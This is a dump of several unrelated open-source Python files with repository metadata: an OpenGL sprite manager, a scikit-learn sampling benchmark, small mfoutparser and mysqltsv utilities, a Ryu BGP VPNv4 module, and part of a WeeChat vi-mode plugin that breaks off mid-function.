Gato-X/NotYourData | gameowfication/sprites.py | 1 | 12620 | """
The MIT License (MIT)
Copyright (c) 2015 Guillermo Romero Franco (AKA Gato)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from glcompat import *
from profiler import profile
import numpy as N
import math
import libs.transformations as T
from gltools import *
#from OpenGL.arrays import vbo
from libs.sortedcontainers.sortedlist import SortedList
_floats_per_vertex = 6
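# Per-vertex layout: 3 floats position (x, y, z), 2 floats texture coords
# (u, v), 1 float alpha.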
class SpriteTexture:
def __init__(self, surface_size):
self._surface = pygame.Surface((surface_size,surface_size), flags=pygame.SRCALPHA)
self._texture = Texture(smoothing=True)
self._texture.setFromSurface(self._surface)
self._vbo_change_low = 1000000
self._vbo_change_high = 0
self.reset()
def getSurface(self):
return self._surface
# note vbo_index is the GLOBAL TILE NUMBER
# that is, not numbered within the texture
def setTainted(self, img = False, vbo_index=None):
if img:
self._img_tainted = True
if vbo_index is not None:
self._vbo_change_low = min(self._vbo_change_low, vbo_index)
self._vbo_change_high = max(self._vbo_change_high, vbo_index+1)
def reset(self):
self._img_tainted = False
self._vbo_change_low = 1000000
self._vbo_change_high = 0
def isImageTainted(self):
return self._img_tainted
def isVboTainted(self):
t = self._vbo_change_high > self._vbo_change_low
return t
def updateGlTexture(self):
if self._img_tainted:
self._texture.update(self._surface)
self._img_tainted = False
def bind(self, loc):
return self._texture.bind(0,loc)
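# Packs every sprite into fixed-size tiles inside a pool of shared textures,
# so all sprites are drawn from one interleaved VBO with a single draw call
# per texture.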
class SpriteManager:
def __init__(self, tile_size=64):
self._tile_size = tile_size
self._texture_size = 1024
self._max_textures = 5
self._tile_rows_in_texture = self._texture_size / tile_size
self._free_tiles = SortedList()
self._textures = []
self._total_tiles = 0
self._sprites = {}
self._top_sprite_id = 0
self._total_tiles_per_texture = int(self._tile_rows_in_texture**2)
self._vbo_index_bytes_per_texture = self._total_tiles_per_texture * 6 * _floats_per_vertex * ctypes.sizeof(ctypes.c_uint16)
        self._max_tiles = self._total_tiles_per_texture * self._max_textures
self.initBuffers()
def initBuffers(self):
self._vao = glGenVertexArray()
glBindVertexArray(self._vao)
self._shader = R.getShaderProgram("sprites")
self._texture_loc = self._shader.getUniformPos("texture0")
# 1 vectors of 3 for vertex coords
# 1 vector of 2 for texture coords
# 1 float for alpha
# = 6 floats = _floats_per_vertex
# x 4 points per quad
self._data = N.zeros((self._max_tiles * 4, _floats_per_vertex),dtype="f")
# 6 indices (2 tris) per quad
indices = N.empty((self._max_tiles,6), dtype=N.uint16)
j = 0
for i in xrange(self._max_tiles):
ind = indices[i,:]
ind[0] = j+0
ind[1] = j+1
ind[2] = j+2
ind[3] = j+0
ind[4] = j+2
ind[5] = j+3
j+=4;
self._vertices_vbo = vbo.VBO(self._data.ravel(),usage=GL_DYNAMIC_DRAW)
self._vertices_vbo.bind()
stride = fsize * _floats_per_vertex
glEnableVertexAttribArray(self._shader.attr_position)
glVertexAttribPointer(self._shader.attr_position, 3, GL_FLOAT, False, stride, None)
glEnableVertexAttribArray(self._shader.attr_tc)
glVertexAttribPointer(self._shader.attr_tc, 2, GL_FLOAT, False, stride, ctypes.c_void_p(3 * fsize))
self._shader.getAttribPos("alpha",True)
glEnableVertexAttribArray(self._shader.attr_alpha)
glVertexAttribPointer(self._shader.attr_alpha, 1, GL_FLOAT, False, stride, ctypes.c_void_p(5*fsize))
self._indices_vbo = vbo.VBO(indices.ravel(), target=GL_ELEMENT_ARRAY_BUFFER,usage=GL_STATIC_DRAW)
self._indices_vbo.bind()
glBindVertexArray(0)
# creates a new texture and pushes all new tiles
# into the _free_tiles list
def newTexture(self):
texture_surface_id = len(self._textures)
texture = SpriteTexture(self._texture_size)
        self._textures.append(texture)
ty = 0
for y in xrange(self._tile_rows_in_texture):
tx = 0
for x in xrange(self._tile_rows_in_texture): # #cols = #rows
self._free_tiles.add((texture_surface_id, (ty,tx), self._total_tiles))
tx += self._tile_size
self._total_tiles += 1
ty += self._tile_size
def getFreeTile(self):
try:
tile = self._free_tiles.pop(0)
except:
self.newTexture() # create more tiles
tile = self._free_tiles.pop(0)
return tile
def setTileAlpha(self, tile, alpha):
texture_surf_id, tile_pos, tile_num = tile
d = self._data[4*tile_num:4*tile_num+4]
d[0:4,5] = alpha
self._textures[texture_surf_id].setTainted(vbo_index=tile_num)
def setTileGraphics(self, tile, src_tile_coord, surf, alpha):
texture_surf_id, (ty,tx), tile_num = tile
src_x = src_tile_coord[0] * self._tile_size
src_y = src_tile_coord[1] * self._tile_size
ts = self._tile_size
# blit texture onto it
tex = self._textures[texture_surf_id]
texture_surf = tex.getSurface()# texture surface
texture_surf.fill((0,0,0,0), rect=(tx,ty,ts,ts) )
texture_surf.blit(surf, (tx,ty), area=(src_x,src_y,ts,ts))
# setup the vbo data
u0 = float(tx) / self._texture_size
u1 = float(tx+ts) / self._texture_size
v0 = 1.0-float(ty) / self._texture_size
v1 = 1.0-float(ty+ts) / self._texture_size
d = self._data[4*tile_num:4*tile_num+4]
d[0][3:6] = (u0,v0, alpha)
d[1][3:6] = (u0,v1, alpha)
d[2][3:6] = (u1,v1, alpha)
d[3][3:6] = (u1,v0, alpha)
tex.setTainted(img=True, vbo_index=tile_num)
def setTileTransform(self, tile, src_tile_coord, transform_info):
texture_surf_id, tile_pos, tile_num = tile
dx,dy,p0,px,py = transform_info
x0 = dx * src_tile_coord[0]
y0 = dy * src_tile_coord[1]
d = self._data[4*tile_num:4*tile_num+4]
vx = px - p0
vy = py - p0
p0 = p0 + vx*x0 + vy*y0
d[0][0:3] = p0
d[1][0:3] = p0 + vy * dy
d[2][0:3] = p0 + vx * dx + vy * dy
d[3][0:3] = p0 + vx * dx
self._textures[texture_surf_id].setTainted(vbo_index=tile_num)
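    # getTransformInfo returns (dx, dy, p0, px, py): the fractional step per
    # tile along each axis, plus the transformed origin and x/y corner points
    # of the full sprite quad.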
def getTransformInfo(self, surf_w, surf_h, xform,centered):
ts = self._tile_size
tiles_w = int(math.ceil(float(surf_w)/ts))
tiles_h = int(math.ceil(float(surf_h)/ts))
p0 = N.array((0,0,0),dtype="f")
px = N.array((surf_w,0,0),dtype="f")
py = N.array((0,surf_h,0),dtype="f")
if centered is not None:
dp = N.array((surf_w*0.5,surf_h*0.5,0),dtype="f")
p0 -= dp
px -= dp
py -= dp
if xform is not None:
xr = xform[0:3,0:3]
xt = xform[0:3,3]
p0 = N.dot(xr,p0)+xt
px = N.dot(xr,px)+xt
py = N.dot(xr,py)+xt
dx = 1.0/tiles_w
dy = 1.0/tiles_h
return dx,dy,p0,px,py
def _newSpriteHlp(self, surface, alpha, xform=None, centered=None):
try:
surface.get_width()
except:
surface = R.loadSurface(surface)
ts = self._tile_size
w,h = surface.get_width(), surface.get_height()
tiles_x = int(math.ceil(float(w)/ts))
tiles_y = int(math.ceil(float(h)/ts))
transform_info = self.getTransformInfo(w,h,xform,centered)
sprite_tiles = []
for y in xrange(tiles_y):
for x in xrange(tiles_x):
tile = self.getFreeTile()
self.setTileGraphics(tile, (x,y), surface, alpha )
self.setTileTransform(tile, (x,y), transform_info )
sprite_tiles.append(tile)
return (sprite_tiles,(w,h),alpha,xform,centered)
def newSprite(self, surface, alpha=1.0, xform=None, centered=None):
try:
surface.get_width()
except:
surface = R.loadSurface(surface,False)
s = self._newSpriteHlp(surface, alpha, xform, centered)
id = self._top_sprite_id
self._sprites[id] = s
self._top_sprite_id+=1
return id
def destroySprite(self, sid):
try:
s = self._sprites[sid]
except:
return
for tile in s[0]: # iterate over the tiles in the sprite
self.setTileAlpha(tile, 0) # this disables the rendering of the sprite
self._free_tiles.add(tile)
del self._sprites[sid]
    def setSpriteAlpha(self, sid, alpha):
        try:
            s = self._sprites[sid]
        except:
            return
        if s[2] == alpha:
            return
        for tile in s[0]: # iterate over the tiles in the sprite
            self.setTileAlpha(tile, alpha)
        # keep the stored alpha in sync so the early-out above stays correct
        self._sprites[sid] = (s[0], s[1], alpha, s[3], s[4])
    def setSpriteTransform(self, sid, xform, centered=None):
        try:
            s = self._sprites[sid]
        except:
            return
        tiles,(w,h),alpha,old_xform,old_centered = s
        if centered is None:
            centered = old_centered
        transform_info = self.getTransformInfo(w,h,xform,centered)
        ts = self._tile_size
        tiles_x = int(math.ceil(float(w)/ts))
        tiles_y = int(math.ceil(float(h)/ts))
        i = 0
        for y in xrange(tiles_y):
            for x in xrange(tiles_x):
                self.setTileTransform(tiles[i], (x,y), transform_info )
                i+=1
        # store the new transform so setSpriteGraphics() rebuilds with it
        self._sprites[sid] = (tiles, (w, h), alpha, xform, centered)
def setSpriteGraphics(self, sid, surface):
try:
s = self._sprites[sid]
except:
return
sprite_tiles,(w,h),alpha,xform,centered = s
for tile in sprite_tiles: # iterate over the tiles in the sprite
self._free_tiles.add(tile)
self.setTileAlpha(tile, 0) # this disables the rendering of the sprite
s = self._newSpriteHlp(surface, alpha, xform, centered)
self._sprites[sid] = s
@profile
def draw(self, scene):
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glDisable(GL_DEPTH_TEST)
self._shader.begin()
scene.uploadMatrices(self._shader)
glBindVertexArray(self._vao)
ofs = 0
self._indices_vbo.bind()
for t in self._textures:
t.updateGlTexture()
if t.isVboTainted():
fac = _floats_per_vertex * 4 * fsize # bytes/quad
self._vertices_vbo.bind()
glBufferSubData(
GL_ARRAY_BUFFER,
fac * t._vbo_change_low,
fac * (t._vbo_change_high - t._vbo_change_low),
self._data[t._vbo_change_low*4:].ravel().ctypes.data_as(ctypes.c_void_p)
)
self._indices_vbo.bind()
t.bind(self._texture_loc)
glDrawElements(GL_TRIANGLES,self._total_tiles_per_texture*6, GL_UNSIGNED_SHORT, ctypes.c_void_p(ofs))
ofs += self._vbo_index_bytes_per_texture
t.reset()
glBindVertexArray(0)
self._shader.end()
glEnable(GL_DEPTH_TEST)
glDisable(GL_BLEND)
| mit | 520,867,695,182,356,860 | 28.280742 | 131 | 0.57916 | false | 3.425624 | false | false | false |
shyamalschandra/scikit-learn | benchmarks/bench_sample_without_replacement.py | 397 | 8008 | """
Benchmarks for sampling without replacement of integer.
"""
from __future__ import division
from __future__ import print_function
import gc
import sys
import optparse
from datetime import datetime
import operator
import matplotlib.pyplot as plt
import numpy as np
import random
from sklearn.externals.six.moves import xrange
from sklearn.utils.random import sample_without_replacement
def compute_time(t_start, delta):
mu_second = 0.0 + 10 ** 6 # number of microseconds in a second
return delta.seconds + delta.microseconds / mu_second
def bench_sample(sampling, n_population, n_samples):
gc.collect()
# start time
t_start = datetime.now()
sampling(n_population, n_samples)
delta = (datetime.now() - t_start)
# stop time
time = compute_time(t_start, delta)
return time
if __name__ == "__main__":
###########################################################################
# Option parser
###########################################################################
op = optparse.OptionParser()
op.add_option("--n-times",
dest="n_times", default=5, type=int,
help="Benchmark results are average over n_times experiments")
op.add_option("--n-population",
dest="n_population", default=100000, type=int,
help="Size of the population to sample from.")
op.add_option("--n-step",
dest="n_steps", default=5, type=int,
help="Number of step interval between 0 and n_population.")
default_algorithms = "custom-tracking-selection,custom-auto," \
"custom-reservoir-sampling,custom-pool,"\
"python-core-sample,numpy-permutation"
op.add_option("--algorithm",
dest="selected_algorithm",
default=default_algorithms,
type=str,
help="Comma-separated list of transformer to benchmark. "
"Default: %default. \nAvailable: %default")
# op.add_option("--random-seed",
# dest="random_seed", default=13, type=int,
# help="Seed used by the random number generators.")
(opts, args) = op.parse_args()
if len(args) > 0:
op.error("this script takes no arguments.")
sys.exit(1)
selected_algorithm = opts.selected_algorithm.split(',')
for key in selected_algorithm:
if key not in default_algorithms.split(','):
raise ValueError("Unknown sampling algorithm \"%s\" not in (%s)."
% (key, default_algorithms))
###########################################################################
# List sampling algorithm
###########################################################################
# We assume that sampling algorithm has the following signature:
# sample(n_population, n_sample)
#
sampling_algorithm = {}
###########################################################################
# Set Python core random.sample method
sampling_algorithm["python-core-sample"] = \
lambda n_population, n_sample: \
random.sample(xrange(n_population), n_sample)
###########################################################################
# Set custom automatic method selection
sampling_algorithm["custom-auto"] = \
lambda n_population, n_samples, random_state=None: \
sample_without_replacement(n_population,
n_samples,
method="auto",
random_state=random_state)
###########################################################################
# Set custom tracking based method
sampling_algorithm["custom-tracking-selection"] = \
lambda n_population, n_samples, random_state=None: \
sample_without_replacement(n_population,
n_samples,
method="tracking_selection",
random_state=random_state)
###########################################################################
# Set custom reservoir based method
sampling_algorithm["custom-reservoir-sampling"] = \
lambda n_population, n_samples, random_state=None: \
sample_without_replacement(n_population,
n_samples,
method="reservoir_sampling",
random_state=random_state)
###########################################################################
# Set custom pool based method
sampling_algorithm["custom-pool"] = \
lambda n_population, n_samples, random_state=None: \
sample_without_replacement(n_population,
n_samples,
method="pool",
random_state=random_state)
###########################################################################
# Numpy permutation based
sampling_algorithm["numpy-permutation"] = \
lambda n_population, n_sample: \
np.random.permutation(n_population)[:n_sample]
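# Note: np.random.permutation shuffles the full population before slicing,
# so its cost grows with n_population even for tiny n_sample -- a useful
# baseline against the dedicated sampling methods above.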
###########################################################################
# Remove unspecified algorithm
sampling_algorithm = dict((key, value)
for key, value in sampling_algorithm.items()
if key in selected_algorithm)
###########################################################################
# Perform benchmark
###########################################################################
time = {}
n_samples = np.linspace(start=0, stop=opts.n_population,
num=opts.n_steps).astype(np.int)
ratio = n_samples / opts.n_population
print('Benchmarks')
print("===========================")
for name in sorted(sampling_algorithm):
print("Perform benchmarks for %s..." % name, end="")
time[name] = np.zeros(shape=(opts.n_steps, opts.n_times))
for step in xrange(opts.n_steps):
for it in xrange(opts.n_times):
time[name][step, it] = bench_sample(sampling_algorithm[name],
opts.n_population,
n_samples[step])
print("done")
print("Averaging results...", end="")
for name in sampling_algorithm:
time[name] = np.mean(time[name], axis=1)
print("done\n")
# Print results
###########################################################################
print("Script arguments")
print("===========================")
arguments = vars(opts)
print("%s \t | %s " % ("Arguments".ljust(16),
"Value".center(12),))
print(25 * "-" + ("|" + "-" * 14) * 1)
for key, value in arguments.items():
print("%s \t | %s " % (str(key).ljust(16),
str(value).strip().center(12)))
print("")
print("Sampling algorithm performance:")
print("===============================")
print("Results are averaged over %s repetition(s)." % opts.n_times)
print("")
fig = plt.figure('scikit-learn sample w/o replacement benchmark results')
plt.title("n_population = %s, n_times = %s" %
(opts.n_population, opts.n_times))
ax = fig.add_subplot(111)
for name in sampling_algorithm:
ax.plot(ratio, time[name], label=name)
ax.set_xlabel('ratio of n_sample / n_population')
ax.set_ylabel('Time (s)')
ax.legend()
# Sort legend labels
handles, labels = ax.get_legend_handles_labels()
hl = sorted(zip(handles, labels), key=operator.itemgetter(1))
handles2, labels2 = zip(*hl)
ax.legend(handles2, labels2, loc=0)
plt.show()
| bsd-3-clause | 8,383,169,419,905,794,000 | 37.68599 | 80 | 0.476523 | false | 4.906863 | false | false | false |
mlgill/mfoutparser | mfoutparser/examples.py | 1 | 1339 | import os
from sys import modules
from shutil import copytree
def copy_examples(dest_path='.'):
"""Copy mfoutparser example files to a specified directory.
Input: destination path for mfoutparser example files,
default directory is the current path.
If the destination directory exists and is not
empty, then a directory called "examples" will
be created for the files inside the destination
directory.
Output: directory with example files
"""
# Setup examples path
mfoutpath = modules['mfoutparser'].__path__[0]
examplespath = os.sep.join([mfoutpath, 'examples'])
# Setup destination path
if dest_path == '.':
dest_path = os.getcwd()
elif dest_path[0] != os.sep:
dest_path = os.sep.join([os.getcwd(), dest_path])
destination = dest_path
# Create a new destination directory if current one is not empty
if os.path.exists(destination):
if os.listdir(destination) != []:
destination = os.sep.join([destination, 'examples'])
# Copy files
try:
copytree(examplespath, destination)
except Exception as e:
print('Files could not be copied to {:s}: {:s}'.format(destination, str(e)))
else:
print('Example files copied to {:s}'.format(destination))
return | bsd-3-clause | -8,326,535,327,619,962,000 | 30.162791 | 70 | 0.637043 | false | 4.478261 | false | false | false |
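# Illustrative usage sketch (assumes the package is importable; the
# destination path is hypothetical):
# from mfoutparser.examples import copy_examples
# copy_examples('/tmp/mfout_examples')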
halfak/mysqltsv | mysqltsv/writer.py | 1 | 1278 | """
This module provides a set of utilities for writing TSV files.
.. autoclass:: mysqltsv.writer.Writer
:members:
.. autofunction:: mysqltsv.functions.write
"""
import logging
from .util import write_row
logger = logging.getLogger(__name__)
class Writer:
"""
Constructs a new TSV row writer.
:Parameters:
f : `file`
A file pointer to write rows to
headers : `list`(`str`)
If a list of `str` is provided, use those strings as headers.
Otherwise, no headers are written.
none_string : `str`
A string that will be written as None when read. (Defaults to
"NULL")
"""
def __init__(self, f, headers=None, none_string="NULL"):
self.f = f
self.none_string = none_string
if headers is not None:
write_row(headers, self.f, none_string=self.none_string)
self.headers = headers
def write(self, row):
"""
Writes a row to the output file.
:Parameters:
row : `list` | `dict` | :class:`~mysqltsv.row_type.AbstractRow`
Datastructure representing the row to write
"""
write_row(row, self.f, headers=self.headers,
none_string=self.none_string)
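# Illustrative usage sketch (hypothetical file and headers):
# with open("out.tsv", "w") as f:
# writer = Writer(f, headers=["id", "name"])
# writer.write({'id': 1, 'name': None}) # None is written as "NULL"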
| mit | 2,299,175,198,851,908,400 | 24.56 | 75 | 0.580595 | false | 3.968944 | false | false | false |
takahashiminoru/ryu | ryu/services/protocols/bgp/info_base/vpnv4.py | 52 | 1825 | # Copyright (C) 2014 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Defines data types and models required specifically for VPNv4 support.
"""
import logging
from ryu.lib.packet.bgp import IPAddrPrefix
from ryu.lib.packet.bgp import RF_IPv4_VPN
from ryu.services.protocols.bgp.info_base.vpn import VpnDest
from ryu.services.protocols.bgp.info_base.vpn import VpnPath
from ryu.services.protocols.bgp.info_base.vpn import VpnTable
LOG = logging.getLogger('bgpspeaker.info_base.vpnv4')
class Vpnv4Dest(VpnDest):
"""VPNv4 Destination
Store IPv4 Paths.
"""
ROUTE_FAMILY = RF_IPv4_VPN
class Vpnv4Table(VpnTable):
"""Global table to store VPNv4 routing information.
Uses `Vpnv4Dest` to store destination information for each known vpnv4
paths.
"""
ROUTE_FAMILY = RF_IPv4_VPN
VPN_DEST_CLASS = Vpnv4Dest
class Vpnv4Path(VpnPath):
"""Represents a way of reaching an VPNv4 destination."""
ROUTE_FAMILY = RF_IPv4_VPN
VRF_PATH_CLASS = None # defined in init - anti cyclic import hack
NLRI_CLASS = IPAddrPrefix
def __init__(self, *args, **kwargs):
super(Vpnv4Path, self).__init__(*args, **kwargs)
from ryu.services.protocols.bgp.info_base.vrf4 import Vrf4Path
self.VRF_PATH_CLASS = Vrf4Path
| apache-2.0 | 8,415,084,465,292,393,000 | 29.932203 | 74 | 0.729315 | false | 3.360958 | false | false | false |
metakirby5/dotfiles | base/.weechat/python/vimode.py | 5 | 50659 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013-2014 Germain Z. <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
# Add vi/vim-like modes to WeeChat.
#
import csv
import os
import re
import subprocess
from StringIO import StringIO
import time
import weechat
# Script info.
# ============
SCRIPT_NAME = "vimode"
SCRIPT_AUTHOR = "GermainZ <[email protected]>"
SCRIPT_VERSION = "0.5"
SCRIPT_LICENSE = "GPL3"
SCRIPT_DESC = ("Add vi/vim-like modes and keybindings to WeeChat.")
# Global variables.
# =================
# General.
# --------
# Halp! Halp! Halp!
GITHUB_BASE = "https://github.com/GermainZ/weechat-vimode/blob/master/"
README_URL = GITHUB_BASE + "README.md"
FAQ_KEYBINDINGS = GITHUB_BASE + "FAQ#problematic-key-bindings.md"
FAQ_ESC = GITHUB_BASE + "FAQ.md#esc-key-not-being-detected-instantly"
# Holds the text of the command-line mode (currently only Ex commands ":").
cmd_text = ""
# Mode we're in. One of INSERT, NORMAL or REPLACE.
mode = "INSERT"
# Holds normal commands (e.g. "dd").
vi_buffer = ""
# See `cb_key_combo_default()`.
esc_pressed = 0
# See `cb_key_pressed()`.
last_signal_time = 0
# See `start_catching_keys()` for more info.
catching_keys_data = {'amount': 0}
# Used for ; and , to store the last f/F/t/T motion.
last_search_motion = {'motion': None, 'data': None}
# Script options.
vimode_settings = {'no_warn': ("off", "don't warn about problematic"
"keybindings and tmux/screen")}
# Regex patterns.
# ---------------
WHITESPACE = re.compile(r"\s")
IS_KEYWORD = re.compile(r"[a-zA-Z0-9_@À-ÿ]")
REGEX_MOTION_LOWERCASE_W = re.compile(r"\b\S|(?<=\s)\S")
REGEX_MOTION_UPPERCASE_W = re.compile(r"(?<=\s)\S")
REGEX_MOTION_UPPERCASE_E = re.compile(r"\S(?!\S)")
REGEX_MOTION_UPPERCASE_B = REGEX_MOTION_UPPERCASE_E
REGEX_MOTION_G_UPPERCASE_E = REGEX_MOTION_UPPERCASE_W
REGEX_MOTION_CARRET = re.compile(r"\S")
REGEX_INT = r"[0-9]"
# Regex used to detect problematic keybindings.
# For example: meta-wmeta-s is bound by default to ``/window swap``.
# If the user pressed Esc-w, WeeChat will detect it as meta-w and will not
# send any signal to `cb_key_combo_default()` just yet, since it's the
# beginning of a known key combo.
# Instead, `cb_key_combo_default()` will receive the Esc-ws signal, which
# becomes "ws" after removing the Esc part, and won't know how to handle it.
REGEX_PROBLEMATIC_KEYBINDINGS = re.compile(r"meta-\w(meta|ctrl)")
# Vi commands.
# ------------
# See Also: `cb_exec_cmd()`.
VI_COMMANDS = {'h': "/help",
'qall': "/exit",
'q': "/close",
'w': "/save",
'set': "/set",
'bp': "/buffer -1",
'bn': "/buffer +1",
'bd': "/close",
'b#': "/input jump_last_buffer_displayed",
'b': "/buffer",
'sp': "/window splith",
'vsp': "/window splitv"}
# Vi operators.
# -------------
# Each operator must have a corresponding function, called "operator_X" where
# X is the operator. For example: `operator_c()`.
VI_OPERATORS = ["c", "d", "y"]
# Vi motions.
# -----------
# Vi motions. Each motion must have a corresponding function, called
# "motion_X" where X is the motion (e.g. `motion_w()`).
# See Also: `SPECIAL_CHARS`.
VI_MOTIONS = ["w", "e", "b", "^", "$", "h", "l", "W", "E", "B", "f", "F", "t",
"T", "ge", "gE", "0"]
# Special characters for motions. The corresponding function's name is
# converted before calling. For example, "^" will call `motion_carret` instead
# of `motion_^` (which isn't allowed because of illegal characters).
SPECIAL_CHARS = {'^': "carret",
'$': "dollar"}
# Methods for vi operators, motions and key bindings.
# ===================================================
# Documented base examples:
# -------------------------
def operator_base(buf, input_line, pos1, pos2, overwrite):
"""Operator method example.
Args:
buf (str): pointer to the current WeeChat buffer.
input_line (str): the content of the input line.
pos1 (int): the starting position of the motion.
pos2 (int): the ending position of the motion.
overwrite (bool, optional): whether the character at the cursor's new
position should be overwritten or not (for inclusive motions).
Defaults to False.
Notes:
Should be called "operator_X", where X is the operator, and defined in
`VI_OPERATORS`.
Must perform actions (e.g. modifying the input line) on its own,
using the WeeChat API.
See Also:
For additional examples, see `operator_d()` and
`operator_y()`.
"""
# Get start and end positions.
start = min(pos1, pos2)
end = max(pos1, pos2)
# Print the text the operator should go over.
weechat.prnt("", "Selection: %s" % input_line[start:end])
def motion_base(input_line, cur, count):
"""Motion method example.
Args:
input_line (str): the content of the input line.
cur (int): the position of the cursor.
count (int): the amount of times to multiply or iterate the action.
Returns:
A tuple containing three values:
int: the new position of the cursor.
bool: True if the motion is inclusive, False otherwise.
bool: True if the motion is catching, False otherwise.
See `start_catching_keys()` for more info on catching motions.
Notes:
Should be called "motion_X", where X is the motion, and defined in
`VI_MOTIONS`.
Must not modify the input line directly.
See Also:
For additional examples, see `motion_w()` (normal motion) and
`motion_f()` (catching motion).
"""
# Find (relative to cur) position of next number.
pos = get_pos(input_line, REGEX_INT, cur, True, count)
# Return the new (absolute) cursor position.
# This motion is exclusive (overwrite is False) and not a catching
# motion, so the last two values are both False.
return cur + pos, False, False
def key_base(buf, input_line, cur, count):
"""Key method example.
Args:
buf (str): pointer to the current WeeChat buffer.
input_line (str): the content of the input line.
cur (int): the position of the cursor.
count (int): the amount of times to multiply or iterate the action.
Notes:
Should be called `key_X`, where X represents the key(s), and defined
in `VI_KEYS`.
Must perform actions on its own (using the WeeChat API).
See Also:
For additional examples, see `key_a()` (normal key) and
`key_r()` (catching key).
"""
# Key was pressed. Go to Insert mode (similar to "i").
set_mode("INSERT")
# Operators:
# ----------
def operator_d(buf, input_line, pos1, pos2, overwrite=False):
"""Delete text from `pos1` to `pos2` from the input line.
If `overwrite` is set to True, the character at the cursor's new position
is removed as well (the motion is inclusive).
See Also:
`operator_base()`.
"""
start = min(pos1, pos2)
end = max(pos1, pos2)
if overwrite:
end += 1
input_line = list(input_line)
del input_line[start:end]
input_line = "".join(input_line)
weechat.buffer_set(buf, "input", input_line)
set_cur(buf, input_line, pos1)
def operator_c(buf, input_line, pos1, pos2, overwrite=False):
"""Delete text from `pos1` to `pos2` from the input and enter Insert mode.
If `overwrite` is set to True, the character at the cursor's new position
is removed as well (the motion is inclusive.)
See Also:
`operator_base()`.
"""
operator_d(buf, input_line, pos1, pos2, overwrite)
set_mode("INSERT")
def operator_y(buf, input_line, pos1, pos2, _):
"""Yank text from `pos1` to `pos2` from the input line.
See Also:
`operator_base()`.
"""
start = min(pos1, pos2)
end = max(pos1, pos2)
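# Note: yanking relies on the external "xclip" utility being installed;
# without it the Popen call below will fail.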
proc = subprocess.Popen(["xclip", "-selection", "c"],
stdin=subprocess.PIPE)
proc.communicate(input=input_line[start:end])
# Motions:
# --------
def motion_0(input_line, cur, count):
"""Go to the first character of the line.
See Also:
`motion_base()`.
"""
return 0, False, False
def motion_w(input_line, cur, count):
"""Go `count` words forward and return position.
See Also:
`motion_base()`.
"""
pos = get_pos(input_line, REGEX_MOTION_LOWERCASE_W, cur, True, count)
if pos == -1:
return len(input_line), False, False
return cur + pos, False, False
def motion_W(input_line, cur, count):
"""Go `count` WORDS forward and return position.
See Also:
`motion_base()`.
"""
pos = get_pos(input_line, REGEX_MOTION_UPPERCASE_W, cur, True, count)
if pos == -1:
return len(input_line), False, False
return cur + pos, False, False
def motion_e(input_line, cur, count):
"""Go to the end of `count` words and return position.
See Also:
`motion_base()`.
"""
for _ in range(max(1, count)):
found = False
pos = cur
for pos in range(cur + 1, len(input_line) - 1):
# Whitespace, keep going.
if WHITESPACE.match(input_line[pos]):
pass
# End of sequence made from 'iskeyword' characters only,
# or end of sequence made from non 'iskeyword' characters only.
elif ((IS_KEYWORD.match(input_line[pos]) and
(not IS_KEYWORD.match(input_line[pos + 1]) or
WHITESPACE.match(input_line[pos + 1]))) or
(not IS_KEYWORD.match(input_line[pos]) and
(IS_KEYWORD.match(input_line[pos + 1]) or
WHITESPACE.match(input_line[pos + 1])))):
found = True
cur = pos
break
# We're at the character before the last and we still found nothing.
# Go to the last character.
if not found:
cur = pos + 1
return cur, True, False
def motion_E(input_line, cur, count):
"""Go to the end of `count` WORDS and return cusor position.
See Also:
`motion_base()`.
"""
pos = get_pos(input_line, REGEX_MOTION_UPPERCASE_E, cur, True, count)
if pos == -1:
return len(input_line), False, False
return cur + pos, True, False
def motion_b(input_line, cur, count):
"""Go `count` words backwards and return position.
See Also:
`motion_base()`.
"""
# "b" is just "e" on inverted data (e.g. "olleH" instead of "Hello").
pos_inv = motion_e(input_line[::-1], len(input_line) - cur - 1, count)[0]
pos = len(input_line) - pos_inv - 1
return pos, True, False
def motion_B(input_line, cur, count):
"""Go `count` WORDS backwards and return position.
See Also:
`motion_base()`.
"""
new_cur = len(input_line) - cur
pos = get_pos(input_line[::-1], REGEX_MOTION_UPPERCASE_B, new_cur,
count=count)
if pos == -1:
return 0, False, False
pos = len(input_line) - (pos + new_cur + 1)
return pos, True, False
def motion_ge(input_line, cur, count):
"""Go to end of `count` words backwards and return position.
See Also:
`motion_base()`.
"""
# "ge is just "w" on inverted data (e.g. "olleH" instead of "Hello").
pos_inv = motion_w(input_line[::-1], len(input_line) - cur - 1, count)[0]
pos = len(input_line) - pos_inv - 1
return pos, True, False
def motion_gE(input_line, cur, count):
"""Go to end of `count` WORDS backwards and return position.
See Also:
`motion_base()`.
"""
new_cur = len(input_line) - cur - 1
